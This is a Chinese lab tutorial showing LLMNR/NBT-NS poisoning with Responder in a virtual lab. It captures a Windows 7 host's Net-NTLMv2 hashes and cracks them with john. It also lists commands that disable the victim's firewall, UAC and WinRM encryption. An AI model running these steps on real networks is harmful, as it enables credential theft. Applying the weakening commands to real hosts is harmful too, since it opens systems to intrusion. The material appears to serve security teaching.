作者:小刚
一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢
本实验仅用于信息防御教学,切勿用于其它用途

实验环境

VM搭建的虚拟测试环境
1.被攻击win7主机192.168.1.130
2.kali 192.168.1.131
3.win7配置

netsh advfirewall set allprofiles state off
winrm quickconfig
winrm set winrm/config/service/auth @{Basic="true"}
winrm set winrm/config/service @{AllowUnencrypted="true"}
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
重启

Responder

responder 这个工具会回答发出的LLMNR和NBT-NS查询,诱使受害者主机提供Net-NTLM哈希。
该工具一般只针对SMB的文件服务器服务请求

安装Responder

Responder在kali中已经内置,但版本更新可能不及时,最好自己进行下载更新
先配置好生成工具等环境

apt-get install build-essential git python-dev

从github下载源码

git clone https://github.com/lagandx/Responder.git
cd Resopnder/
git pull

Responder参数

Resopnder有很多参数
-I 设置监听的网络接口,eth0
-f 收集NBT_NS或LLMNR的信息
-w 设置WPAD服务器

获取NTLMv2哈希

1.开始毒化,监听请求信息

./Responder.py -wfF -I eth0

在这里插入图片描述
此时kali已经毒化完成,并监听信息。
2.使用被攻击主机随意访问域内共享文件,或访问域内主机
在这里插入图片描述

时已经获取到了被攻击主机的哈希值
3.CTRL+C进行结束进程,使用./DumpHash.py导出捕获的哈希值

./DumpHash.py

在这里插入图片描述
此时生成两个文件,DumpNTLMv1.txt和DumpNTLMv2.txt。
4.破解hash密码
使用Hashcat或者john等密码破解工具进行破解

john DumpNTLMv2.txt

在这里插入图片描述
破解出用户名hacker,密码password1

Logo

有“AI”的1024 = 2048,欢迎大家加入2048 AI社区

更多推荐